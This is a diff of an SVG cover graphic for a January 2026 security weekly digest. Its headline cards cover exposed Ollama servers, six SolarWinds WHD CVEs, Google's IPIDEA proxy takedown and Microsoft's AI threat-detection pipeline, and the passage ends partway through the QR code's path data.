+    <circle cx="64" cy="64" r="3" fill="#F87171"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.3s" begin="0.1s" repeatCount="indefinite"/></circle>
+    <circle cx="64" cy="81" r="3" fill="#4CAF50"><animate attributeName="opacity" values="0.3;1;0.3" dur="2.0s" repeatCount="indefinite"/></circle>
+    <text x="38" y="96" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="700" fill="#F87171">EXPOSED</text>
   </g>
-  <text x="142" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#ef4444" text-anchor="middle">AI AGENT</text>
-  <!-- Card 2: GO LANG -->
-  <rect x="268" y="100" width="220" height="120" rx="8" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1.5"/>
-  <circle cx="288" cy="120" r="6" fill="#f59e0b"/>
-  <g transform="translate(378,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#f59e0b" stroke-width="1.8"/>
-  </g>
-  <text x="378" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#f59e0b" text-anchor="middle">GO LANG</text>
-  <!-- Card 3: SEC OPS -->
-  <rect x="504" y="100" width="220" height="120" rx="8" fill="#0a1020" stroke="#3b82f6" stroke-width="1.5"/>
-  <circle cx="524" cy="120" r="6" fill="#3b82f6"/>
-  <g transform="translate(614,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#3b82f6" stroke-width="1.8"/>
-  </g>
-  <text x="614" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#3b82f6" text-anchor="middle">SEC OPS</text>
-  <!-- Card 4: LLM SEC -->
-  <rect x="740" y="100" width="200" height="120" rx="8" fill="#071a10" stroke="#22c55e" stroke-width="1.5"/>
-  <circle cx="760" cy="120" r="6" fill="#22c55e"/>
-  <g transform="translate(840,148)">
-    <circle cx="-12" cy="-8" r="4" fill="none" stroke="#22c55e" stroke-width="1.5"/><circle cx="12" cy="-8" r="4" fill="none" stroke="#22c55e" stroke-width="1.5"/><circle cx="0" cy="8" r="5" fill="none" stroke="#22c55e" stroke-width="1.8"/><line x1="-8" y1="-6" x2="-2" y2="6" stroke="#22c55e" stroke-width="1.2" opacity="0.7"/><line x1="8" y1="-6" x2="2" y2="6" stroke="#22c55e" stroke-width="1.2" opacity="0.7"/><line x1="-8" y1="-8" x2="8" y2="-8" stroke="#22c55e" stroke-width="1.2" opacity="0.5"/>
-  </g>
-  <text x="840" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22c55e" text-anchor="middle">LLM SEC</text>
-  <!-- Card 5: THREAT INT -->
-  <rect x="956" y="100" width="212" height="120" rx="8" fill="#071a20" stroke="#22d3ee" stroke-width="1.5"/>
-  <circle cx="976" cy="120" r="6" fill="#22d3ee"/>
-  <g transform="translate(1062,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#22d3ee" stroke-width="1.8"/>
-  </g>
-  <text x="1062" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22d3ee" text-anchor="middle">THREAT INT</text>
 
-  <!-- Threat map area -->
-  <rect x="32" y="240" width="1136" height="220" rx="10" fill="#0c1220" stroke="#1e293b" stroke-width="1"/>
-
-  <!-- Ambient dots -->
-  <g opacity="0.25">
-    <circle cx="180" cy="330" r="2" fill="#94a3b8"/><circle cx="200" cy="340" r="2" fill="#94a3b8"/>
-    <circle cx="550" cy="310" r="2" fill="#94a3b8"/><circle cx="570" cy="325" r="2" fill="#94a3b8"/>
-    <circle cx="750" cy="320" r="2" fill="#94a3b8"/><circle cx="900" cy="330" r="2" fill="#94a3b8"/>
-    <circle cx="350" cy="350" r="2" fill="#94a3b8"/><circle cx="1000" cy="340" r="2" fill="#94a3b8"/>
+  <!-- Globe with pulse dots (130 countries) -->
+  <g transform="translate(128,114)" filter="url(#softShadow)">
+    <circle cx="42" cy="42" r="40" fill="none" stroke="#E63946" stroke-width="1.4" opacity="0.6"/>
+    <ellipse cx="42" cy="42" rx="18" ry="40" fill="none" stroke="#E63946" stroke-width="1" opacity="0.4"/>
+    <line x1="2" y1="42" x2="82" y2="42" stroke="#E63946" stroke-width="1" opacity="0.35"/>
+    <line x1="4" y1="26" x2="80" y2="26" stroke="#E63946" stroke-width="0.8" opacity="0.25"/>
+    <line x1="4" y1="58" x2="80" y2="58" stroke="#E63946" stroke-width="0.8" opacity="0.25"/>
+    <circle cx="22" cy="32" r="3.5" fill="#F87171"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.4s" repeatCount="indefinite"/></circle>
+    <circle cx="58" cy="24" r="3.5" fill="#F87171"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.8s" begin="0.3s" repeatCount="indefinite"/></circle>
+    <circle cx="68" cy="46" r="3.5" fill="#F87171"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.2s" begin="0.6s" repeatCount="indefinite"/></circle>
+    <circle cx="30" cy="56" r="3.5" fill="#F87171"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.6s" begin="0.9s" repeatCount="indefinite"/></circle>
+    <circle cx="50" cy="62" r="3.5" fill="#F87171"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.0s" begin="0.4s" repeatCount="indefinite"/></circle>
+    <text x="42" y="94" text-anchor="middle" font-family="Inter, monospace" font-size="9" font-weight="700" fill="#F87171">130 countries</text>
   </g>
-  <!-- Node: AI AGENT -->
-  <circle cx="170" cy="340" r="22" fill="#1a0505" stroke="#ef4444" stroke-width="2"/>
-  <text x="170" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">AI</text>
-  <!-- Node: GO LANG -->
-  <circle cx="370" cy="350" r="20" fill="#1a0d0d" stroke="#f59e0b" stroke-width="2"/>
-  <text x="370" y="354" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">GO</text>
-  <!-- Node: SEC OPS -->
-  <circle cx="580" cy="330" r="22" fill="#0a1020" stroke="#3b82f6" stroke-width="2"/>
-  <text x="580" y="334" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#3b82f6" text-anchor="middle">SEC</text>
-  <!-- Node: LLM SEC -->
-  <circle cx="780" cy="355" r="18" fill="#071a10" stroke="#22c55e" stroke-width="2"/>
-  <text x="780" y="359" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22c55e" text-anchor="middle">LLM</text>
-  <!-- Node: THREAT INT -->
-  <circle cx="980" cy="340" r="22" fill="#071a20" stroke="#22d3ee" stroke-width="2"/>
-  <text x="980" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">THRE</text>
-  <line x1="192" y1="340" x2="350" y2="350" stroke="#ef4444" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="390" y1="350" x2="558" y2="330" stroke="#f59e0b" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="602" y1="330" x2="762" y2="355" stroke="#3b82f6" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="798" y1="355" x2="958" y2="340" stroke="#22c55e" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
 
-  <!-- Footer -->
-  <rect x="0" y="472" width="1200" height="158" fill="#080c18" opacity="0.95"/>
-  <rect x="0" y="472" width="1200" height="2" fill="#1e293b"/>
+  <!-- KPI card 120x100 -->
+  <g transform="translate(428,128)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="120" height="100" rx="10" fill="#1E0A14" stroke="#E63946" stroke-width="1.8"/>
+    <text x="60" y="24" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" letter-spacing="2" fill="#F87171">EXPOSED</text>
+    <text x="60" y="62" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="30" font-weight="900" fill="#F5F7FA">175K</text>
+    <text x="60" y="82" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="600" fill="#FBB6BD">Ollama servers</text>
+    <text x="60" y="96" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="9" font-weight="500" fill="#F87171">LLMjacking risk</text>
+  </g>
 
-  <!-- Tags -->
-  <rect x="32" y="490" width="92" height="24" rx="4" fill="#1a0505" stroke="#ef4444" stroke-width="1"/>
-  <text x="78" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#ef4444" text-anchor="middle">AI AGENT</text>
-  <rect x="136" y="490" width="83" height="24" rx="4" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1"/>
-  <text x="177" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#f59e0b" text-anchor="middle">GO LANG</text>
-  <rect x="231" y="490" width="83" height="24" rx="4" fill="#0a1020" stroke="#3b82f6" stroke-width="1"/>
-  <text x="272" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#3b82f6" text-anchor="middle">SEC OPS</text>
-  <rect x="326" y="490" width="83" height="24" rx="4" fill="#071a10" stroke="#22c55e" stroke-width="1"/>
-  <text x="367" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22c55e" text-anchor="middle">LLM SEC</text>
-  <rect x="421" y="490" width="110" height="24" rx="4" fill="#071a20" stroke="#22d3ee" stroke-width="1"/>
-  <text x="476" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22d3ee" text-anchor="middle">THREAT INT</text>
+  <!-- Pulse dots header -->
+  <g fill="#F87171">
+    <circle cx="530" cy="26" r="1.4"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.8s" repeatCount="indefinite"/></circle>
+    <circle cx="546" cy="26" r="1.4"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.4s" begin="0.3s" repeatCount="indefinite"/></circle>
+  </g>
+</g>
 
-  <!-- Bottom bar -->
-  <circle cx="32" cy="545" r="4" fill="#ef4444" opacity="0.6"/>
-  <text x="46" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569">Security Weekly Digest | January 30, 2026</text>
-  <text x="1168" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569" text-anchor="end">tech.2twodragon.com</text>
+<!-- ============================================= -->
+<!-- CARD 02: SolarWinds WHD 6 CVEs (top-right)   -->
+<!-- ============================================= -->
+<g transform="translate(612,80)">
+  <rect x="0" y="0" width="556" height="248" rx="14" fill="url(#cardB)" stroke="#FF6B2B" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="6" height="248" rx="3" fill="#FF6B2B"/>
+  <rect x="0" y="0" width="556" height="4" fill="#FF6B2B" opacity="0.7"/>
+
+  <g transform="translate(20,18)">
+    <rect x="0" y="0" width="40" height="40" rx="6" fill="#FF6B2B" opacity="0.22"/>
+    <text x="20" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="900" fill="#FF8C5A">02</text>
+  </g>
+
+  <g filter="url(#textShadow)">
+    <text x="74" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#FF8C5A" letter-spacing="2.4">CRITICAL  /  RCE</text>
+    <text x="74" y="60" font-family="Inter, Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F5F7FA">SolarWinds WHD 6 CVEs</text>
+  </g>
+  <text x="20" y="100" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#FFBD99">CVSS 9.8 x4 — unauth deserialization RCE + auth bypass</text>
+
+  <!-- CVE severity bars -->
+  <g transform="translate(20,114)" filter="url(#softShadow)">
+    <rect x="0" y="0"   width="118" height="18" rx="3" fill="#FF6B2B" opacity="0.9"/>
+    <text x="6" y="13" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#FFFFFF">CVE-2025-40551  9.8</text>
+
+    <rect x="0" y="22" width="118" height="18" rx="3" fill="#FF6B2B" opacity="0.9"/>
+    <text x="6" y="35" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#FFFFFF">CVE-2025-40552  9.8</text>
+
+    <rect x="0" y="44" width="100" height="18" rx="3" fill="#FF8C5A" opacity="0.8"/>
+    <text x="6" y="57" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#FFFFFF">RCE #3          9.8</text>
+
+    <rect x="0" y="66" width="100" height="18" rx="3" fill="#FF8C5A" opacity="0.8"/>
+    <text x="6" y="79" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#FFFFFF">RCE #4          9.8</text>
+
+    <rect x="0" y="88" width="80" height="18" rx="3" fill="#FFB703" opacity="0.7"/>
+    <text x="6" y="101" font-family="Inter, monospace" font-size="10" font-weight="600" fill="#FFFFFF">Auth Bypass     7.5</text>
+
+    <rect x="0" y="110" width="80" height="18" rx="3" fill="#FFB703" opacity="0.7"/>
+    <text x="6" y="123" font-family="Inter, monospace" font-size="10" font-weight="600" fill="#FFFFFF">Priv Esc        7.5</text>
+  </g>
+
+  <!-- Patch badge -->
+  <g transform="translate(178,136)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="100" height="70" rx="8" fill="#1A0D05" stroke="#FF6B2B" stroke-width="1.6"/>
+    <text x="50" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="9" font-weight="700" letter-spacing="1.5" fill="#FF8C5A">PATCH NOW</text>
+    <text x="50" y="46" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="900" fill="#F5F7FA">WHD</text>
+    <text x="50" y="62" text-anchor="middle" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#FFBD99">2026.1</text>
+  </g>
+
+  <!-- KPI card -->
+  <g transform="translate(420,128)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="120" height="100" rx="10" fill="#1E0D05" stroke="#FF6B2B" stroke-width="1.8"/>
+    <text x="60" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" letter-spacing="2" fill="#FF8C5A">CVSS MAX</text>
+    <text x="60" y="58" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="34" font-weight="900" fill="#F5F7FA">9.8</text>
+    <text x="60" y="78" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="600" fill="#FFBD99">x4 Critical RCE</text>
+    <text x="60" y="94" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="600" fill="#FFBD99">6 CVEs total</text>
+  </g>
+
+  <!-- Pulse dots -->
+  <g fill="#FF6B2B">
+    <circle cx="524" cy="26" r="1.4"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.5s" repeatCount="indefinite"/></circle>
+    <circle cx="540" cy="26" r="1.4"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.7s" begin="0.3s" repeatCount="indefinite"/></circle>
+  </g>
+</g>
+
+<!-- ================================================ -->
+<!-- CARD 03: Google GTIG IPIDEA Takedown (bot-left)  -->
+<!-- ================================================ -->
+<g transform="translate(32,348)">
+  <rect x="0" y="0" width="564" height="242" rx="14" fill="url(#cardC)" stroke="#FFB703" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="6" height="242" rx="3" fill="#FFB703"/>
+  <rect x="0" y="0" width="564" height="4" fill="#FFB703" opacity="0.7"/>
+
+  <g transform="translate(20,18)">
+    <rect x="0" y="0" width="40" height="40" rx="6" fill="#FFB703" opacity="0.22"/>
+    <text x="20" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="900" fill="#FFB703">03</text>
+  </g>
+
+  <g filter="url(#textShadow)">
+    <text x="74" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#FFD058" letter-spacing="2.4">HIGH  /  PROXY TAKEDOWN</text>
+    <text x="74" y="60" font-family="Inter, Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F5F7FA">Google GTIG Disrupts IPIDEA</text>
+  </g>
+  <text x="20" y="100" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#FFE08A">6.1M IP residential proxy network seized, 550+ threat groups</text>
+
+  <!-- Network disruption diagram -->
+  <g transform="translate(30,112)" filter="url(#softShadow)">
+    <!-- Central IPIDEA hub -->
+    <circle cx="52" cy="52" r="24" fill="#1A1800" stroke="#FFB703" stroke-width="2"/>
+    <text x="52" y="48" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="700" fill="#FFD058">IPIDEA</text>
+    <text x="52" y="60" text-anchor="middle" font-family="Inter, monospace" font-size="7" fill="#FFD058">PROXY</text>
+    <!-- Spokes - dashed -->
+    <g stroke="#FFB703" stroke-width="1.2" stroke-dasharray="3 3" opacity="0.65" fill="none">
+      <line x1="52" y1="28" x2="52" y2="8"/>
+      <line x1="52" y1="76" x2="52" y2="96"/>
+      <line x1="28" y1="52" x2="8" y2="52"/>
+      <line x1="76" y1="52" x2="96" y2="52"/>
+    </g>
+    <!-- Outer nodes -->
+    <circle cx="52" cy="6"  r="6" fill="#1A1400" stroke="#FFB703" stroke-width="1.2"/>
+    <circle cx="52" cy="98" r="6" fill="#1A1400" stroke="#FFB703" stroke-width="1.2"/>
+    <circle cx="6"  cy="52" r="6" fill="#1A1400" stroke="#FFB703" stroke-width="1.2"/>
+    <circle cx="98" cy="52" r="6" fill="#1A1400" stroke="#FFB703" stroke-width="1.2"/>
+    <!-- Cut X marks -->
+    <g stroke="#E63946" stroke-width="2.2" stroke-linecap="round">
+      <line x1="48" y1="2" x2="56" y2="10"/><line x1="56" y1="2" x2="48" y2="10"/>
+      <line x1="48" y1="94" x2="56" y2="102"/><line x1="56" y1="94" x2="48" y2="102"/>
+      <line x1="2" y1="48" x2="10" y2="56"/><line x1="2" y1="56" x2="10" y2="48"/>
+      <line x1="94" y1="48" x2="102" y2="56"/><line x1="94" y1="56" x2="102" y2="48"/>
+    </g>
+    <!-- GTIG shield overlay -->
+    <g transform="translate(30,30)">
+      <polygon points="22,0 44,9 44,29 22,40 0,29 0,9" fill="#0A1A06" stroke="#4CAF50" stroke-width="1.8"/>
+      <text x="22" y="24" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="9" font-weight="900" fill="#4CAF50">GTIG</text>
+    </g>
+  </g>
+
+  <!-- Stats list -->
+  <g transform="translate(168,118)">
+    <g>
+      <circle cx="8" cy="8" r="4" fill="#FFB703"/>
+      <text x="22" y="12" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#FFE08A">6.1M IPs seized globally</text>
+    </g>
+    <g transform="translate(0,24)">
+      <circle cx="8" cy="8" r="4" fill="#FFB703"/>
+      <text x="22" y="12" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#FFE08A">550+ threat groups disrupted</text>
+    </g>
+    <g transform="translate(0,48)">
+      <circle cx="8" cy="8" r="4" fill="#FFB703"/>
+      <text x="22" y="12" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#FFE08A">Residential proxy SDK removed</text>
+    </g>
+    <g transform="translate(0,72)">
+      <circle cx="8" cy="8" r="4" fill="#FFB703"/>
+      <text x="22" y="12" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#FFE08A">Google Play Protect activated</text>
+    </g>
+  </g>
+
+  <!-- KPI card -->
+  <g transform="translate(430,118)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="120" height="100" rx="10" fill="#1A1600" stroke="#FFB703" stroke-width="1.8"/>
+    <text x="60" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" letter-spacing="2" fill="#FFD058">SEIZED</text>
+    <text x="60" y="60" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="30" font-weight="900" fill="#F5F7FA">6.1M</text>
+    <text x="60" y="80" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="600" fill="#FFE08A">proxy IPs blocked</text>
+    <text x="60" y="96" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="600" fill="#FFE08A">GTIG operation</text>
+  </g>
+</g>
+
+<!-- ====================================================== -->
+<!-- CARD 04: Microsoft AI Threat Detection (bottom-right)  -->
+<!-- ====================================================== -->
+<g transform="translate(612,348)">
+  <rect x="0" y="0" width="556" height="242" rx="14" fill="url(#cardD)" stroke="#3A86FF" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="6" height="242" rx="3" fill="#3A86FF"/>
+  <rect x="0" y="0" width="556" height="4" fill="#3A86FF" opacity="0.7"/>
+
+  <g transform="translate(20,18)">
+    <rect x="0" y="0" width="40" height="40" rx="6" fill="#3A86FF" opacity="0.22"/>
+    <text x="20" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="900" fill="#8FB8FF">04</text>
+  </g>
+
+  <g filter="url(#textShadow)">
+    <text x="74" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#8FB8FF" letter-spacing="2.4">MEDIUM  /  AI SECOPS</text>
+    <text x="74" y="60" font-family="Inter, Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F5F7FA">Microsoft AI Threat Detection</text>
+  </g>
+  <text x="20" y="100" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#BFC9D9">TTP extraction to detection rules via AI automation workflow</text>
+
+  <!-- Pipeline flow: Report -> AI TTP -> Detect Rules -->
+  <g transform="translate(22,112)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="82" height="38" rx="6" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.4"/>
+    <text x="41" y="16" text-anchor="middle" font-family="Inter, monospace" font-size="9" font-weight="700" fill="#8FB8FF">THREAT</text>
+    <text x="41" y="30" text-anchor="middle" font-family="Inter, monospace" font-size="9" font-weight="700" fill="#8FB8FF">REPORT</text>
+
+    <path d="M84 19 L100 19" stroke="#3A86FF" stroke-width="2" fill="none" stroke-dasharray="4 3">
+      <animate attributeName="stroke-dashoffset" values="0;-14" dur="1.2s" repeatCount="indefinite"/>
+    </path>
+    <polygon points="98,15 106,19 98,23" fill="#3A86FF"/>
+
+    <rect x="108" y="0" width="82" height="38" rx="6" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.4"/>
+    <text x="149" y="16" text-anchor="middle" font-family="Inter, monospace" font-size="9" font-weight="700" fill="#8FB8FF">AI TTP</text>
+    <text x="149" y="30" text-anchor="middle" font-family="Inter, monospace" font-size="9" font-weight="700" fill="#8FB8FF">EXTRACT</text>
+
+    <path d="M192 19 L208 19" stroke="#3A86FF" stroke-width="2" fill="none" stroke-dasharray="4 3">
+      <animate attributeName="stroke-dashoffset" values="0;-14" dur="1.2s" begin="0.4s" repeatCount="indefinite"/>
+    </path>
+    <polygon points="206,15 214,19 206,23" fill="#3A86FF"/>
+
+    <rect x="216" y="0" width="82" height="38" rx="6" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.4"/>
+    <text x="257" y="16" text-anchor="middle" font-family="Inter, monospace" font-size="9" font-weight="700" fill="#8FB8FF">DETECT</text>
+    <text x="257" y="30" text-anchor="middle" font-family="Inter, monospace" font-size="9" font-weight="700" fill="#8FB8FF">RULES</text>
+  </g>
+
+  <!-- Capabilities -->
+  <g transform="translate(22,164)">
+    <g>
+      <circle cx="8" cy="8" r="4" fill="#3A86FF"/>
+      <text x="22" y="12" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#BFC9D9">Automated TTP extraction</text>
+    </g>
+    <g transform="translate(0,24)">
+      <circle cx="8" cy="8" r="4" fill="#3A86FF"/>
+      <text x="22" y="12" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#BFC9D9">Detection rule auto-generation</text>
+    </g>
+    <g transform="translate(0,48)">
+      <circle cx="8" cy="8" r="4" fill="#3A86FF"/>
+      <text x="22" y="12" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#BFC9D9">AI-native SecOps workflow</text>
+    </g>
+  </g>
+
+  <!-- KPI card -->
+  <g transform="translate(420,118)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="120" height="100" rx="10" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.8"/>
+    <text x="60" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" letter-spacing="2" fill="#8FB8FF">PIPELINE</text>
+    <text x="60" y="60" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="30" font-weight="900" fill="#F5F7FA">AI</text>
+    <text x="60" y="80" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="600" fill="#8FB8FF">TTP to Detection</text>
+    <text x="60" y="96" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="600" fill="#8FB8FF">Microsoft SecOps</text>
+  </g>
+
+  <!-- Pulse dots -->
+  <g fill="#3A86FF">
+    <circle cx="524" cy="26" r="1.4"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.6s" repeatCount="indefinite"/></circle>
+    <circle cx="540" cy="26" r="1.4"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.9s" begin="0.3s" repeatCount="indefinite"/></circle>
+  </g>
+</g>
+
+<!-- Severity pulse indicators in header zone -->
+<g opacity="0.85">
+  <g fill="#F87171">
+    <rect x="210" y="66" width="4" height="4" rx="1"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.4s" repeatCount="indefinite"/></rect>
+    <rect x="222" y="66" width="4" height="4" rx="1"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.6s" begin="0.3s" repeatCount="indefinite"/></rect>
+  </g>
+  <g fill="#FF6B2B">
+    <rect x="790" y="66" width="4" height="4" rx="1"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.5s" repeatCount="indefinite"/></rect>
+    <rect x="802" y="66" width="4" height="4" rx="1"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.7s" begin="0.3s" repeatCount="indefinite"/></rect>
+  </g>
+</g>
+
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/01/30/Tech_Security_Weekly_Digest_Ollama_AI_SolarWinds_RCE_Google_IPIDEA/ : 45x45 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(1.866667)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM9 0h1v1h-1zM11 0h1v1h-1zM17 0h3v1h-3zM21 0h1v1h-1zM25 0h1v1h-1zM29 0h2v1h-2zM32 0h1v1h-1zM36 0h1v1h-1zM38 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM11 1h4v1h-4zM16 1h1v1h-1zM19 1h6v1h-6zM27 1h1v1h-1zM29 1h1v1h-1zM35 1h1v1h-1zM38 1h1v1h-1zM44 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM8 2h1v1h-1zM10 2h1v1h-1zM12 2h1v1h-1zM16 2h5v1h-5zM25 2h2v1h-2zM29 2h1v1h-1zM31 2h1v1h-1zM33 2h1v1h-1zM35 2h1v1h-1zM38 2h1v1h-1zM40 2h3v1h-3zM44 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM8 3h2v1h-2zM11 3h2v1h-2zM15 3h1v1h-1zM17 3h7v1h-7zM25 3h2v1h-2zM29 3h1v1h-1zM31 3h1v1h-1zM35 3h2v1h-2zM38 3h1v1h-1zM40 3h3v1h-3zM44 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM8 4h9v1h-9zM19 4h6v1h-6zM28 4h4v1h-4zM34 4h3v1h-3zM38 4h1v1h-1zM40 4h3v1h-3zM44 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM8 5h1v1h-1zM10 5h3v1h-3zM16 5h2v1h-2zM20 5h1v1h-1zM24 5h1v1h-1zM28 5h3v1h-3zM32 5h2v1h-2zM38 5h1v1h-1zM44 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h1v1h-1zM36 6h1v1h-1zM38 6h7v1h-7zM8 7h1v1h-1zM11 7h1v1h-1zM13 7h3v1h-3zM19 7h2v1h-2zM24 7h1v1h-1zM27 7h3v1h-3zM32 7h1v1h-1zM35 7h1v1h-1zM0 8h1v1h-1zM2 8h5v1h-5zM10 8h1v1h-1zM17 8h1v1h-1zM19 8h7v1h-7zM30 8h2v1h-2zM33 8h1v1h-1zM35 8h1v1h-1zM38 8h5v1h-5zM2 9h4v1h-4zM7 9h1v1h-1zM10 9h1v1h-1zM13 9h4v1h-4zM18 9h3v1h-3zM22 9h4v1h-4zM27 9h4v1h-4zM35 9h2v1h-2zM40 9h5v1h-5zM1 10h2v1h-2zM5 10h3v1h-3zM10 10h1v1h-1zM12 